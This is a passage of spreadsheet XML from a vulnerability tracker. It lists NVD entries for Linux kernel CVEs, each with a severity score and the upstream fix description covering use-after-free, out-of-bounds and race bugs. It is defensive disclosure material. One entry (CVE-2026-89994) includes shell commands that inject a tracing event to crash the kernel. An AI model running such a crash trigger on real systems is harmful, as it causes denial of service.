      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89940</t>
        </is>
      </c>
      <c r="D510" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F510" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr"/>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: buffer: Tie IIO dma fence lock lifetime to the fence
The `iio_dma_fence` implementation currently uses a lock embedded in the
`iio_dmabuf_priv`. But the `iio_dma_fence` can outlive the
`iio_dmabuf_priv`, which can cause a use-after-free.
Tie the lifetime of the lock to the lifetime of the fence by embedding them
in the same struct.
We can't just hold a reference to the `iio_dmabuf_priv` from the
`iio_dma_fence` since `iio_buffer_dmabuf_release()` might sleep and the
fence release callback is not allowed to sleep.
Note that the `dma_fence` framework now has an internal lock that gets used
when the passing `NULL` for `lock` in `dma_fence_init()`, but in order to
allow this patch to be backportable use an external lock.</t>
        </is>
      </c>
      <c r="S510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89940</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89941</t>
        </is>
      </c>
      <c r="D511" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F511" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr"/>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: buffer: Make IIO DMA fence release RCU-safe
The `dma_fence` documentation states that if a custom release
implementation is provided, the `dma_fence` object must be freed in an
RCU-safe way. The current `iio_dma_fence` implementation uses `kfree()`,
which might result in a use-after-free.
Remove the custom `release` implementation. This makes the DMA fence core
fall back to `dma_fence_free()`, which calls `kfree_rcu()` on the fence.
This requires that the fence be the first member of `struct iio_dma_fence`.
Using the default release method for extended DMA fence structures is a
common pattern.</t>
        </is>
      </c>
      <c r="S511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89941</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89942</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr"/>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: buffer: Fix potential use-after-free in anonymous buffer release
An anonymous buffer handle holds a reference to the underlying IIO device.
The reference is dropped in the buffer handle's release function. If the
device has been removed, either through unbind or hot-unplug, the buffer
handle might hold the last reference.
The release function takes the mutex for the buffer using a guard, which
means the unlock happens after all the code in the function, including
`iio_device_put()`. If the anonymous buffer holds the last reference this
might free both the IIO device and the buffer, which contains the mutex,
leading to use-after-free when the mutex is unlocked.
Fix this by using a scoped guard just around the buffer dmabuf list access,
making sure the mutex is unlocked before releasing the IIO device.
Version 10 of the patch that introduced this issue used this exact scheme
of first unlocking and then dropping the reference [1]. During review it
was suggested to use a guard instead, and version 11 made that change [2].</t>
        </is>
      </c>
      <c r="S512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89942</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89961</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr"/>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
powerpc/mm: fix wrong addr_pfn tracking in compound vmemmap population
vmemmap_populate_compound_pages() uses addr_pfn to determine the PFN
offset within a compound page and to decide whether the current vmemmap
slot should be populated as a head page mapping or should reuse a tail
page mapping.
However, addr_pfn is advanced manually in parallel with addr.  The loop
itself progresses in vmemmap address space, so each PAGE_SIZE step in addr
covers PAGE_SIZE / sizeof(struct page) struct page slots.  Since addr_pfn
is compared against nr_pages in data-PFN units, it should advance by the
same number of PFNs.  The existing manual increments do not match that and
therefore do not reliably track the PFN corresponding to the current addr.
As a result, pfn_offset can be computed from the wrong PFN and the code
can make the head/tail decision for the wrong compound-page position.
Fix this by deriving addr_pfn directly from the current vmemmap address
instead of carrying it as loop state.</t>
        </is>
      </c>
      <c r="S513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89961</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89965</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr"/>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvdimm/btt: reject an arena whose nfree is below the lane count
The BTT info block's nfree field, the number of reserve free blocks, is
read from the medium without validation.  btt_freelist_init() and
btt_rtt_init() size the per-lane freelist[] and rtt[] arrays by nfree,
but the I/O path indexes them by the lane from nd_region_acquire_lane(),
which is bounded by nd_region-&gt;num_lanes (ND_MAX_LANES), not by nfree.
A crafted or foreign arena whose nfree is below the lane count makes
freelist[lane]/rtt[lane] run past the allocation: an out-of-bounds write.
btt.rst documents the nlanes = min(nfree, num_cpus) invariant, which the
code does not currently honor: num_lanes is ND_MAX_LANES regardless of
nfree.  Reject an arena whose nfree is below num_lanes at discovery,
before the per-lane arrays are allocated, enforcing that invariant.</t>
        </is>
      </c>
      <c r="S514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89965</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89967</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr"/>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/migrate_device: avoid out-of-bounds writes for compound folios
migrate_device_range() and migrate_device_pfns() clear the entries
following a compound folio so that the PFN arrays retain their
page-granular representation.
If a compound folio extends beyond the end of the caller-provided range,
the loops clear all following folio entries without limiting them to the
number of slots remaining in the npages-sized array, causing an
out-of-bounds write.
Do not proceed with a compound folio if its page-granular representation
does not fit entirely in the remaining PFN array.  If this happens, drop
any reference and lock acquired for the folio, clear the remaining
entries, and stop collecting.
Observed with a KASAN x86 QEMU kernel using the HMM migrate_anon_huge_zero
selftest.  Closing /dev/hmm_dmirror0 after migrating an anonymous huge
page to device memory exercises:
  dmirror_fops_release()
    -&gt; dmirror_device_evict_chunk()
      -&gt; migrate_device_range()</t>
        </is>
      </c>
      <c r="S515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89967</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89979</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr"/>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: pcm: Fix race between non-atomic ops and trigger-start
We protect the races of the concurrent state transitions between
atomic PCM ops, but the checks between the non-atomic ops (hw_params,
hw_free and prepare) and the atomic ops aren't perfect; there is a
check of the conflicting PCM state at the beginning of hw_params &amp; co,
but the atomic PCM ops can be still issued during the non-atomic PCM
operations.  An example such scenario is that a thread A re-issues the
PREPARE or HW_PARAMS for the already prepared stream, while another
thread B triggers the PCM start in the middle of the prepare
operation.  Although this usually doesn't lead to much serious issues,
it can give some inconsistency as reported by syzkaller (such as
ODEBUG warning).
There are various atomic PCM ops, and basically the only problem is
the PCM start as it operates from the PREPARED state.  Other trigger
commands (stop, etc) are for the running or the other special state,
hence they are filtered as pre-condition.
This patch is for preventing the PCM trigger-start during the non-
atomic operations in order to address the problems above.
Fortunately, the hw_params, hw_free and prepare operations call
snd_pcm_buffer_access_lock(), and this can be used for checking the
concurrent operations at the PCM trigger -- which sets the
runtime-&gt;buffer_accessing to a negative (if possible), so the PCM
trigger just needs to check the runtime-&gt;buffer_accessing value; if
it's negative, it means the concurrent non-atomic PCM ops is running.</t>
        </is>
      </c>
      <c r="S516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89979</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89985</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="inlineStr"/>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr"/>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr"/>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
memcg: keep folio's objcg same as its node
memcg_reparent_objcgs() has an inherent assumption that a folio's objcg is
the objcg of the folio's node.  Folio migration across nodes breaks that
assumption: the new folio simply inherits the old folio's objcg while
living on a different node.
Once the assumption is broken, the reparenting of the folio's objcg and
the reparenting of the folio's LRU list are no longer atomic. 
memcg_reparent_objcgs() handles one node per iteration and drops all the
locks in between, so the objcg gets reparented in the iteration for the
objcg's node while the LRU list gets spliced in the iteration for the
folio's node.  Any LRU operation on that folio in between resolves its
lruvec through the objcg, and thus takes the lru_lock of the wrong memcg,
not the lru_lock of the list the folio is actually on.
Fix this by selecting the objcg by folio_nid() at charge time, and by
re-deriving it for the destination node in mem_cgroup_migrate() and
mem_cgroup_replace_folio().</t>
        </is>
      </c>
      <c r="S517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89985</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89986</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr"/>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mm/mempolicy: fix sleeping allocation in alloc_pages_bulk_weighted_interleave()
syzbot reported a sleeping function called from invalid context splat in
bucket_table_alloc().
When rhashtable_insert_slow() rehashes the table under rcu_read_lock(), it
calls bucket_table_alloc(..., GFP_ATOMIC | __GFP_NOWARN).  If the bucket
table allocation uses vmalloc, __vmalloc_node_range_noprof() invokes
vm_area_alloc_pages() -&gt; alloc_pages_bulk_mempolicy_noprof() with the
passed GFP_ATOMIC flags.
If the current task has an MPOL_WEIGHTED_INTERLEAVE mempolicy,
alloc_pages_bulk_weighted_interleave() is called and currently hardcodes
GFP_KERNEL when allocating the temporary weights array, triggering a
might_alloc() splat in atomic/RCU contexts.
Pass the gfp flags (masked with GFP_RECLAIM_MASK to strip page-allocator
zone modifiers like __GFP_HIGHMEM) received by
alloc_pages_bulk_weighted_interleave() to kmalloc() instead of hardcoding
GFP_KERNEL.  Since the weights buffer is immediately initialized in full,
kmalloc() is sufficient.</t>
        </is>
      </c>
      <c r="S518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89986</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89988</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr"/>
      <c r="Q519" s="5" t="inlineStr"/>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
kprobes: Protect kprobe_blacklist with RCU
__within_kprobe_blacklist() traverses kprobe_blacklist without holding
kprobe_mutex. When a module is unloaded, kprobe_remove_area_blacklist()
removes blacklist entries and immediately frees them with kfree().
A concurrent call to within_kprobe_blacklist() can therefore dereference
freed memory.
Furthermore, within_kprobe_blacklist() can be called in atomic or
non-preemptible contexts where the sleeping kprobe_mutex cannot be taken.
Protect kprobe_blacklist with RCU. Use guard(rcu)() and
list_for_each_entry_rcu() for traversal, list_add_tail_rcu() for
insertions, list_del_rcu() for deletions, and kfree_rcu() to reclaim
entries safely after a grace period.</t>
        </is>
      </c>
      <c r="S519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89988</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89994</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr"/>
      <c r="Q520" s="5" t="inlineStr"/>
      <c r="R520" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dmaengine: fsl-edma: tracing: no ptr dereference during log output
The fsl edma events store a pointer to a struct fsl_edma_engine in the
ringbuffer and dereference it when a log entry is printed. At this time,
the pointer may no longer be valid.
Event injection can be used to trigger a crash:
$ cd /sys/kernel/tracing
$ echo 'value = 0' &gt; events/fsl_edma/edma_writeb/inject
$ cat trace
The log output needs only edma-&gt;membase. Add a membase field at the end
of the event and use the new field for log output. Keep the existing
fields for backward compatibility.</t>
        </is>
      </c>
      <c r="S520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89994</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89997</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr"/>
      <c r="Q521" s="5" t="inlineStr"/>
      <c r="R521" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm: fix resume-vs-remove race
If the user issues the resume ioctl and the remove ioctl at the same
time, it may be possible that the device is resumed after it is suspended
in __dm_destroy. The result is that the table is destroyed without
calling the postsuspend method.
Dm targets expect that they may be removed only after the postsuspend
method method was called. If we break this expectation, it can cause
misbehavior in various targets. For example - in the dm-integrity target,
the reboot notifier is not unregistered, leading to use-after-free.
Fix this bug by refusing to resume if the device is being destroyed.</t>
        </is>
      </c>
      <c r="S521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89997</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89998</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="inlineStr"/>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr"/>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr"/>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm: fix race when loading and unloading a table
If the userspace calls two concurrent table load ioctls and one of them
succeeds and the other fails, there is a race condition because
dm_setup_md_queue walks &amp;md-&gt;table_devices without any lock. If the walk
races with dm_table_destroy -&gt; free_devices -&gt; dm_put_table_device, there
is access to invalid memory.
Fix this race by extending the lock over the list walk.</t>
        </is>
      </c>
      <c r="S522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89998</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90001</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr"/>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: bpf: serialize device reference release in struct_ops destroy path
__hid_bpf_ops_destroy_device() and hid_bpf_unreg() can race on the
same registration reference, double-putting struct hid_device and
freeing it while hid_destroy_device() still uses it.  Serialize the
remove/NULL decision under hdev-&gt;bpf.prog_list_lock so exactly one
path releases each registration reference: unreg re-checks ops-&gt;hdev
under the lock and returns without putting when the destroy path
already cleared it; all put_device() calls happen after the lock is
dropped, which is safe because a concurrent unreg then observes
ops-&gt;hdev == NULL under the lock.
Background: each successful attach (hid_bpf_ops_reg) acquires one
device reference (hid_get_device()).  Two paths can release it:
- device destruction: hid_destroy_device() -&gt; hid_bpf_destroy_device()
  -&gt; __hid_bpf_ops_destroy_device(), which walks hdev-&gt;bpf.prog_list
